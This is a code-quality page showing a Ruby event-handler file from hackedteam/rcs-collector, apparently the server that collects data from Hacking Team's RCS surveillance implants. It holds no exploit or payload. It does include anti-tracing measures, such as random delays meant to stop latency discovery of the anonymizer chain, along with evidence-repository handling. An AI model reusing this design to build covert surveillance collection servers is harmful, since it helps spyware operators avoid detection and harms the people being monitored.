hackedteam/rcs-collector

View on GitHub
lib/rcs-collector/events.rb

Summary

Maintainability
B
6 hrs
Test Coverage
#
#  Event handlers
#

# relatives
require_relative 'heartbeat'
require_relative 'http_parser'
require_relative 'sessions'
require_relative 'statistics'
require_relative 'firewall'

# from RCS::Common
require 'rcs-common/trace'
require 'rcs-common/systemstatus'

# system
require 'eventmachine'
require 'em-http-server'
require 'socket'

module RCS
module Collector

class HTTPHandler < EM::HttpServer::Server
  include RCS::Tracer
  include Parser
  
  attr_reader :peer
  attr_reader :peer_port
  
  def post_init

    @request_time = Time.now

    # get the peer name
    if get_peername
      @peer_port, @peer = Socket.unpack_sockaddr_in(get_peername)
    else
      @peer = 'unknown'
      @peer_port = 0
    end

    @network_peer = @peer

    # timeout on the socket
    set_comm_inactivity_timeout 300

    trace :debug, "Connection from #{@network_peer}:#{@peer_port}"
  end

  def closed?
    @closed
  end

  def unbind
    trace :debug, "Connection closed #{@peer}:#{@peer_port}"
    @closed = true
  end

  # override of the em-http-server handler
  def http_error_string(code, desc)
    request = {}
    request[:headers] = @http
    peer = http_get_forwarded_peer(@http)
    @peer = peer unless peer.nil?

    trace :warn, "HACK ALERT: #{@peer} is sending bad requests: #{@http_headers.inspect}"

    # sleep a random amount of time
    # this is done to prevent latency discovery of the anon chain
    sleep rand
    # close the connection
    close_connection

    return ''
  end

  def http_request_errback(exception)
    http_error_string(500, "Server error")

    trace :error, "INTERNAL SERVER ERROR: #{@peer} something caused a deep exception: #{exception.message}"
  end

  # return the content of the X-Forwarded-For header
  def http_get_forwarded_peer(headers)
    # extract the XFF
    xff = headers[:x_forwarded_for]
    # no header
    return nil if xff.nil?
    # split the peers list
    peers = xff.split(',')
    trace :info, "[#{@peer}] has forwarded the connection for #{peers.inspect}"
    # we just want the first peer that is the original one
    return peers.first
  end

  def invalid_http_protocol
    trace :warn, "HACK ALERT: #{@peer} is sending bad requests (#{@http_protocol}): #{@http_headers.inspect}"
    # sleep a random amount of time
    # this is done to prevent latency discovery of the anon chain
    sleep rand
    close_connection
  end

  def process_http_request

    # get the peer of the communication
    # if direct or thru an anonymizer
    peer = http_get_forwarded_peer(@http)
    @peer = peer unless peer.nil?

    #trace :info, "[#{@peer}] Incoming HTTP Connection"
    size = (@http_content) ? @http_content.bytesize : 0
    trace :debug, "[#{@peer}] REQ: [#{@http_request_method}] #{@http_request_uri} #{@http_query_string} (#{Time.now - @request_time}) #{size.to_s_bytes}" unless @http_request_method.eql? 'WATCHDOG'

    # get it again since if the connection is kept-alive we need a fresh timing for each
    # request and not the total from the beginning of the connection
    @request_time = Time.now

    # update the connection statistics
    StatsManager.instance.add conn: 1

    $watchdog.synchronize do

      responder = nil

      # Block which fulfills the request
      operation = proc do

        trace :debug, "[#{@peer}] QUE: [#{@http_request_method}] #{@http_request_uri} #{@http_query_string} (#{Time.now - @request_time})" if Config.instance.global['PERF']

        generation_time = Time.now

        begin
          if @http_protocol != 'HTTP/1.1' and @http_protocol != 'HTTP/1.0'
            invalid_http_protocol
            # return from block
            next
          end

          # parse all the request params
          request = prepare_request @http_request_method, @http_request_uri, @http_query_string, @http_content, @http, @peer

          # get the correct controller
          controller = CollectorController.new @signature
          controller.request = request

          # do the dirty job :)
          responder = controller.act!

          # create the response object to be used in the EM::defer callback
          reply = responder.prepare_response(self, request)

          # keep the size of the reply to be used in the closing method
          @response_size = reply.content ? reply.content.bytesize : 0
          trace :debug, "[#{@peer}] GEN: [#{request[:method]}] #{request[:uri]} #{request[:query]} (#{Time.now - generation_time}) #{@response_size.to_s_bytes}" if Config.instance.global['PERF']

          reply
        rescue Exception => e
          trace :error, e.message
          trace :fatal, "EXCEPTION(#{e.class}): " + e.backtrace.join("\n")

          close_connection
        end

      end

      # Callback block to execute once the request is fulfilled
      response = proc do |reply|
        # safe escape on invalid reply
        next unless reply

        # send the actual response
        reply.send_response

         # keep the size of the reply to be used in the closing method
        @response_size = reply.headers['Content-length'] || 0
      end


      # Let the thread pool handle request
      EM.defer(operation, response)

    end

  end

end #HTTPHandler


class HttpServer
  extend RCS::Tracer

  def self.running?
    @server_handle
  end

  def self.start
    @port = RCS::Collector::Config.instance.global['LISTENING_PORT']
    trace(:info, "Listening on port #{@port}...")
    @server_handle = EM.start_server("0.0.0.0", @port, HTTPHandler)
  rescue Exception => e
    trace(:fatal, "Unable to start http server on port #{@port}: #{e.message} #{e.backtrace}")
    exit!(1)
  end

  def self.stop
    return unless @server_handle

    trace(:info, "Stopping http server...")
    EM.stop_server(@server_handle) if @server_handle
    @server_handle = nil
  rescue Exception => e
    trace(:fatal, "Unable to stop http server: #{e.message} #{e.backtrace}")
    exit!(1)
  end

end


class Events
  include RCS::Tracer

  def setup
    # if we have epoll(), prefer it over select()
    EM.epoll

    # set the thread pool size
    EM.threadpool_size = 50

    EM::run do
      if Firewall.ok?
        Firewall.create_default_rules
        HttpServer.start
      else
        trace(:error, "#{Firewall.error_message}. The http server will not start.")
      end

      # send the first heartbeat to the db, we are alive and want to notify the db immediately
      # subsequent heartbeats will be sent every HB_INTERVAL
      HeartBeat.perform

      # set up the heartbeat (the interval is in the config)
      EM::PeriodicTimer.new(Config.instance.global['HB_INTERVAL']) { EM.defer(proc{ HeartBeat.perform }) }

      # timeout for the sessions (will destroy inactive sessions)
      EM::PeriodicTimer.new(60) { EM.defer(proc{ SessionManager.instance.timeout }) }

      # calculate and save the stats
      EM::PeriodicTimer.new(60) { EM.defer(proc{ StatsManager.instance.calculate }) }

      # auto purge old repositories every hour
      EM::PeriodicTimer.new(3600) { EM.defer(proc{ EvidenceManager.instance.purge_old_repos }) }
    end
  end
end #Events

end #Collector::
end #RCS::